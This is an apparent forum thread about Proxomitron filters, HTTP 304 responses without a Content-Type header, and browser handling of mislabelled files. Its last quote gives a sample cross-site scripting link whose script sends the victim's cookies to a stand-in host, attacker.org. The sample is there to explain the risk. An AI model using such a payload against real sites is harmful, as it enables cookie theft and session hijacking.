quote:
All 304's (Not Modified) trigger the filter, since an incoming 304 doesn't carry a Content-Type header (same for the "missing" filter).
I think there is no way to let proxo check the incoming HTTP/1.x line, that contains the response code.
quote:
Rethinking ...
JarC, isn't that the same problem, but the other way around?
I mean somehow you have to know it's not a 304 you are adding the header to.
quote:
I see what you mean, what I was thinking was using a header that would always be present in anything other return than 304, so the filter would not accidentally tag a response as 304 while it is not
quote:
try yourself writing a css as .txt file and include it in a html page: all works fine!!
quote:
...but MSIE may.
<a href="http://www.target.com/foo<script>-like exploit.
document.location='http://www.attacker.org/?'
+document.cookies</script>">Click here</a>